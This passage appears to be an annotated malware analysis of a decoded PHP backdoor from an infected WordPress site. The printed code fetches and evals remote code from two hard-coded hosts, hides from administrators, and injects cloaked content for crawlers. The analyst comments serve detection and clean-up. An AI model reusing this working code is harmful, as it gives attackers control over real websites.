JlcGxhY2VfZmlyc3QoJHRhZywgJHRhZy4iICIuJHRleHQxLCAkcCk7DQoJCQkJCX0NCgkJCQl9ZWxzZXsNCgkJCQkJJHA9JHAuJHRleHQxOw0KCQkJCX0NCgkJCX0NCg0KCQl9DQoJfQ0KDQoNCglyZXR1cm4gJHA7IA0KfSANCn0NCg0KaWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpKXsNCglvYl9zdGFydCgiY2FsbGJhY2tfZnVuY3Rpb25fcGhwIik7DQp9DQo="));
  9.  
  10. Base64-decoding the argument of that eval() call gives:
  11.  
  12. <?php if (function_exists('get_url_999') === false) {
          /**
           * Download dispatcher of the malware: fetches $url by trying five transport
           * helpers in a fixed order (cURL, file(), fopen(), fsockopen(), raw sockets)
           * and returns the first result that is not false.
           *
           * Analyst note: the fallback chain lets the download succeed on hosts where
           * some of these functions are missing; each helper checks function_exists()
           * for its own transport first. Every call is prefixed with @, so failures
           * leave no PHP warnings in the error log.
           *
           * @param string $url URL to fetch (built in update_file_999()).
           * @return string Response text, or '' when every helper returned false.
           */
  13.     function get_url_999($url) {
  14.         $content = "";
  15.         $content = @trycurl_999($url);
  16.         if ($content !== false) return $content;
  17.         $content = @tryfile_999($url);
  18.         if ($content !== false) return $content;
  19.         $content = @tryfopen_999($url);
  20.         if ($content !== false) return $content;
  21.         $content = @tryfsockopen_999($url);
  22.         if ($content !== false) return $content;
  23.         $content = @trysocket_999($url);
  24.         if ($content !== false) return $content;
  25.         return '';
  26.     }
  27. }
  28. if (function_exists('trycurl_999') === false) {
          /**
           * Transport helper 1: fetch $url with the cURL extension.
           *
           * @param string $url URL to fetch.
           * @return string|false Response body, or false when cURL is unavailable or
           *                      the result compares loosely equal to "".
           */
  29.     function trycurl_999($url) {
  30.         if (function_exists('curl_init') === false) return false;
  31.         $ch = curl_init();
  32.         curl_setopt($ch, CURLOPT_URL, $url);
              // Return the body as a string instead of printing it.
  33.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
              // 5-second timeout, so a dead server delays the page load only briefly.
  34.         curl_setopt($ch, CURLOPT_TIMEOUT, 5);
              // Headers are excluded; only the body is wanted.
  35.         curl_setopt($ch, CURLOPT_HEADER, 0);
  36.         $result = curl_exec($ch);
  37.         curl_close($ch);
              // Loose comparison: a false result from curl_exec() also matches "" here.
  38.         if ($result == "") return false;
  39.         return $result;
  40.     }
  41. }
  42. if (function_exists('tryfile_999') === false) {
          /**
           * Transport helper 2: fetch $url with file() and join the returned lines.
           *
           * Analyst note: file() only accepts an http:// URL when PHP's allow_url_fopen
           * setting is enabled, so disabling that setting (where the site allows it)
           * closes this path and the fopen() one.
           *
           * @param string $url URL to fetch.
           * @return string|false Joined content, or false when it is empty.
           */
  43.     function tryfile_999($url) {
  44.         if (function_exists('file') === false) return false;
  45.         $inc = @file($url);
              // @ hides the warning implode() raises when file() failed and $inc is false.
  46.         $buf = @implode('', $inc);
  47.         if ($buf == "") return false;
  48.         return $buf;
  49.     }
  50. }
  51. if (function_exists('tryfopen_999') === false) {
          /**
           * Transport helper 3: fetch $url through fopen() on the URL, reading it in
           * 10000-byte chunks until end of stream.
           *
           * @param string $url URL to fetch.
           * @return string|false Content read, or false when the stream could not be
           *                      opened or nothing was read.
           */
  52.     function tryfopen_999($url) {
  53.         if (function_exists('fopen') === false) return false;
  54.         $buf = '';
  55.         $f = @fopen($url, 'r');
  56.         if ($f) {
  57.             while (!feof($f)) {
  58.                 $buf.= fread($f, 10000);
  59.             }
  60.             fclose($f);
  61.         } else return false;
  62.         if ($buf == "") return false;
  63.         return $buf;
  64.     }
  65. }
  66. if (function_exists('tryfsockopen_999') === false) {
          /**
           * Transport helper 4: fetch $url with a hand-written HTTP/1.0 GET over
           * fsockopen(), always on TCP port 80 (plain HTTP, no TLS).
           *
           * Analyst note: the request carries only a request line and a Host header,
           * with no User-Agent, which can help distinguish it in proxy or egress logs.
           *
           * @param string $url URL to fetch; host, path and query are taken from parse_url().
           * @return string|false Text after the first blank line of the response, or
           *                      false when the connection failed or nothing was read.
           */
  67.     function tryfsockopen_999($url) {
  68.         if (function_exists('fsockopen') === false) return false;
  69.         $p = @parse_url($url);
  70.         $host = $p['host'];
  71.         $uri = $p['path'] . '?' . $p['query'];
              // Port 80 with a 30-second connect timeout.
  72.         $f = @fsockopen($host, 80, $errno, $errstr, 30);
  73.         if (!$f) return false;
              // The two string literals below contain line breaks, so each one spans
              // several lines of this listing.
  74.         $request = "GET $uri HTTP/1.0
  75. ";
  76.         $request.= "Host: $host
  77.  
  78. ";
  79.         fwrite($f, $request);
  80.         $buf = '';
  81.         while (!feof($f)) {
  82.             $buf.= fread($f, 10000);
  83.         }
  84.         fclose($f);
  85.         if ($buf == "") return false;
              // Split on CR LF CR LF: element 0 (the headers) is discarded and element 1
              // (the text up to the next CR LF CR LF, if there is one) becomes the result.
  86.         list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
  87.         return $buf;
  88.     }
  89. }
  90. if (function_exists('trysocket_999') === false) {
          /**
           * Transport helper 5 (last resort): fetch $url with the sockets extension,
           * resolving the host itself and sending the same HTTP/1.0 GET on port 80.
           *
           * @param string $url URL to fetch; host, path and query are taken from parse_url().
           * @return string|false Text after the first blank line of the response, or
           *                      false on resolution/connection failure or empty read.
           */
  91.     function trysocket_999($url) {
  92.         if (function_exists('socket_create') === false) return false;
  93.         $p = @parse_url($url);
  94.         $host = $p['host'];
  95.         $uri = $p['path'] . '?' . $p['query'];
              // gethostbyname() returns its input unchanged when resolution fails; the
              // ip2long()/long2ip() round trip only reproduces a dotted-quad IPv4
              // address, so a mismatch means no usable address was obtained.
  96.         $ip1 = @gethostbyname($host);
  97.         $ip2 = @long2ip(@ip2long($ip1));
  98.         if ($ip1 != $ip2) return false;
  99.         $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  100.         if (!@socket_connect($sock, $ip1, 80)) {
  101.             @socket_close($sock);
  102.             return false;
  103.         }
               // The two string literals below contain line breaks, so each one spans
               // several lines of this listing.
  104.         $request = "GET $uri HTTP/1.0
  105. ";
  106.         $request.= "Host: $host
  107.  
  108. ";
  109.         socket_write($sock, $request);
  110.         $buf = '';
               // Read until socket_read() returns an empty string or false.
  111.         while ($t = socket_read($sock, 10000)) {
  112.             $buf.= $t;
  113.         }
  114.         @socket_close($sock);
  115.         if ($buf == "") return false;
               // Split on CR LF CR LF; element 1 (the text after the headers) is kept.
  116.         list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
  117.         return $buf;
  118.     }
  119. }
  120. if (function_exists('str_replace_first') === false) {
           /**
            * Replace only the first occurrence of $search in $subject, matching
            * case-insensitively (stripos). callback_function_php() uses it to splice
            * injected markup next to a marker tag in the page HTML.
            *
            * @param string $search  Text to locate.
            * @param string $replace Replacement text.
            * @param string $subject Text to search in.
            * @return string $subject with the first match replaced, or unchanged when
            *                there is no match.
            */
  121.     function str_replace_first($search, $replace, $subject) {
  122.         $pos = stripos($subject, $search);
  123.         if ($pos !== false) {
  124.             $subject = substr_replace($subject, $replace, $pos, strlen($search));
  125.         }
  126.         return $subject;
  127.     }
  128. }
  129. if (function_exists('is_bot_ua') === false) {
           /**
            * Crawler check by User-Agent: returns 1 when the request's User-Agent
            * contains "msnbot", "Yahoo", "bingbot" or "googlebot" (case-insensitive),
            * otherwise 0.
            *
            * Analyst note: the check relies on the header alone, so requesting a page
            * with one of these strings in the User-Agent (and no WordPress cookies)
            * shows a responder what the crawler-only payload types inject.
            *
            * @return int 1 for a matching User-Agent, 0 otherwise.
            */
  130.     function is_bot_ua() {
  131.         $bot = 0;
               // @ hides the notice raised when the header is missing.
  132.         $ua = @$_SERVER['HTTP_USER_AGENT'];
  133.         if (stristr($ua, "msnbot") || stristr($ua, "Yahoo")) $bot = 1;
  134.         if (stristr($ua, "bingbot") || stristr($ua, "googlebot")) $bot = 1;
  135.         return $bot;
  136.     }
  137. }
  138. if (function_exists('is_googlebot_ip') === false) {
           /**
            * Crawler check by source address: returns 1 when REMOTE_ADDR, as an
            * unsigned 32-bit integer, lies between 1123631104 and 1123639295, i.e.
            * 66.249.64.0 through 66.249.95.255 (66.249.64.0/19).
            *
            * NOTE(review): going by the function name this is presumably meant to be
            * a Googlebot crawl range; the code itself only shows the numeric bounds.
            *
            * @return int 1 when the client address is inside the range, 0 otherwise.
            */
  139.     function is_googlebot_ip() {
  140.         $k = 0;
               // "%u" formats the ip2long() result as unsigned, so the comparison
               // also works where ip2long() yields a negative integer.
  141.         $ip = sprintf("%u", @ip2long(@$_SERVER["REMOTE_ADDR"]));
  142.         if (($ip >= 1123631104) && ($ip <= 1123639295)) $k = 1;
  143.         return $k;
  144.     }
  145. }
  146. if (function_exists('update_file_999') === false) {
           /**
            * Command-and-control fetch: downloads the current payload from the first
            * hard-coded host, falling back to the second when the first returns
            * nothing, and executes any code section the response carries.
            *
            * Analyst notes:
            *  - Both URLs use plain http:// and the same path and query string. The
            *    two host names and the "g.php?t=m&i=" request are usable as network
            *    indicators in proxy, DNS and egress-firewall logs.
            *  - The 32-hex-character "i" value looks like an identifier sent to the
            *    server; what it identifies cannot be told from this code.
            *  - When the response contains the marker "|||CODE|||", the text after it
            *    is base64-decoded and passed to eval(). This gives whoever controls
            *    (or can impersonate, since there is no TLS or signature check) those
            *    hosts arbitrary PHP execution on the site, so an infected site must be
            *    treated as fully compromised, not merely as serving injected content.
            *
            * @return string The response text before the "|||CODE|||" marker, or the
            *                whole response when the marker is absent.
            */
  147.     function update_file_999() {
  148.         $uri = "g.php?t=m&i=90953d565019fc505275b68cd432bc75";
  149.         $actual1 = "http://pupkonexs.com/" . $uri;
  150.         $actual2 = "http://cooperjsutf8.ru/" . $uri;
  151.         $val = get_url_999($actual1);
  152.         if ($val == "") $val = get_url_999($actual2);
  153.         if (strstr($val, "|||CODE|||")) {
  154.             list($val, $code) = explode("|||CODE|||", $val);
                   // Remote code execution point: server-supplied PHP is run here.
  155.             eval(base64_decode($code));
  156.         }
  157.         return $val;
  158.     }
  159. }
  160. if (function_exists('callback_function_php') === false) {
           /**
            * Output-buffer callback (registered with ob_start() at the end of the
            * payload): receives the finished page HTML in $p and returns it, possibly
            * with attacker-supplied markup spliced in.
            *
            * Behaviour visible in the code:
            *  1. Returns the page untouched for requests that carry WordPress cookies,
            *     come from a logged-in user, or target xmlrpc.php, wp-login or wp-admin.
            *  2. Keeps its state in a WordPress option holding [payload, timestamp]
            *     and refreshes it through update_file_999() when the option is new or
            *     older than 12 hours.
            *  3. Parses the payload as "<type>|||<base64 text>" and injects:
            *       type 0    - a script part and a text part, for every visitor;
            *       type 1, 4 - text only when is_bot_ua() matches;
            *       type 2, 3 - text only when is_googlebot_ip() matches.
            *
            * Analyst notes:
            *  - Because of step 1, an administrator browsing the site while logged in
            *    never sees the injection. Check with a clean client: no cookies, a
            *    front-end URL, and for types 1-4 a crawler User-Agent.
            *  - Serving extra content only to crawlers is consistent with SEO spam /
            *    cloaking; what is actually injected depends on the server response.
            *  - The option is created with autoload 'no'. During clean-up, look in
            *    the options table for an entry whose value is a two-element array of
            *    a "|||"-delimited string and a Unix timestamp.
            *
            * @param string $p Buffered page output.
            * @return string The page output, modified or not.
            */
  161.     function callback_function_php($p) {
               // Stay invisible to anyone who looks like a site user or administrator.
  162.         if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in())) {
  163.             return $p;
  164.         }
  165.         if (stristr($_SERVER['REQUEST_URI'], "xmlrpc.php")) {
  166.             return $p;
  167.         }
  168.         if (stristr($_SERVER['REQUEST_URI'], "wp-login")) {
  169.             return $p;
  170.         }
  171.         if (stristr($_SERVER['REQUEST_URI'], "wp-admin")) {
  172.             return $p;
  173.         }
               // Option name used as the cache key. NOTE(review): '{options_names}'
               // looks like a template placeholder that was never filled in for this
               // sample; other samples may carry a different name here.
  174.         $x = '{options_names}';
  175.         $buf = "";
  176.         $update = 0;
  177.         $k = get_option($x);
  178.         if ($k === FALSE) {
                   // First run: create the option (empty array, autoload 'no') and
                   // force a download.
  179.             $emp = array();
  180.             if (!add_option($x, $emp, '', 'no')) {
  181.                 return $p;
  182.             }
  183.             $update = 1;
  184.         } else {
                   // $k[1] is the time of the last download; refresh after 12 hours.
  185.             $ctime = time() - @$k[1];
  186.             if ($ctime > 3600 * 12) {
  187.                 $update = 1;
  188.             }
  189.         }
  190.         if ($update) {
                   // Contacts the remote hosts; may also eval() server-supplied code.
  191.             $val = update_file_999();
  192.             $k = array();
  193.             $k[0] = $val;
  194.             $k[1] = time();
  195.             if (!update_option($x, $k)) {
  196.                 return $p;
  197.             }
  198.         }
               // Re-read the stored value; the assignment happens inside the condition.
  199.         if (!$k = get_option($x)) {
  200.             return $p;
  201.         }
  202.         $buf = @$k[0];
  203.         if ($buf == "") {
  204.             return $p;
  205.         }
               // Payload format: "<type>|||<base64 text>".
  206.         list($type, $text) = @explode("|||", $buf);
  207.         if ($text == "") return $p;
               // Adding 0 converts the type field from string to number.
  208.         $type+= 0;
  209.         $bot = 0;
  210.         if ($type == 0) {
                   // Type 0: the decoded text holds four "|||"-separated fields:
                   // marker for the script, the script, marker for the text, the text.
  211.             $buf1 = base64_decode($text);
  212.             list($tagjs, $js, $tagtext1, $text1) = @explode("|||", $buf1);
                   // Already injected into this page: do nothing.
  213.             if (stristr($p, $text1)) return $p;
                   // Insert $js before the first $tagjs marker, or append it to the page.
  214.             if (($tagjs != "") && (stristr($p, $tagjs))) {
  215.                 $p = str_replace_first($tagjs, $js . " " . $tagjs, $p);
  216.             } else {
  217.                 $p = $p . $js;
  218.             }
                   // Insert $text1 before the first $tagtext1 marker, or append it.
  219.             if (($tagtext1 != "") && (stristr($p, $tagtext1))) {
  220.                 $p = str_replace_first($tagtext1, $text1 . " " . $tagtext1, $p);
  221.             } else {
  222.                 $p = $p . $text1;
  223.             }
  224.         } else if (($type == 1) || ($type == 2) || ($type == 3) || ($type == 4)) {
                   // Types 1 and 4 gate on the User-Agent, types 2 and 3 on the source IP.
  225.             if (($type == 1) || ($type == 4)) {
  226.                 $bot = is_bot_ua();
  227.             }
  228.             if (($type == 2) || ($type == 3)) {
  229.                 $bot = is_googlebot_ip();
  230.             }
  231.             if ($bot) {
                       // Crawler-only content: the decoded text is "<marker>|||<text>".
  232.                 $buf1 = base64_decode($text);
  233.                 list($tag, $text1) = @explode("|||", $buf1);
  234.                 if (($tag != "") && ($text1 != "")) {
  235.                     if (stristr($p, $tag)) {
                               // Types 3 and 4 add the text after every occurrence of
                               // the marker; types 1 and 2 only after the first one.
  236.                         if (($type == 3) || ($type == 4)) {
  237.                             $p = @str_ireplace($tag, $tag . " " . $text1, $p);
  238.                         } else {
  239.                             $p = str_replace_first($tag, $tag . " " . $text1, $p);
  240.                         }
  241.                     } else {
                               // Marker not present: append the text to the page.
  242.                         $p = $p . $text1;
  243.                     }
  244.                 }
  245.             }
  246.         }
  247.         return $p;
  248.     }
  249. }
  250. if (function_exists('ob_start')) {
           // Activation point: starts output buffering with callback_function_php as
           // the handler, so the page output produced after this call is passed
           // through that function before it is sent to the client.
  251.     ob_start("callback_function_php");
  252. }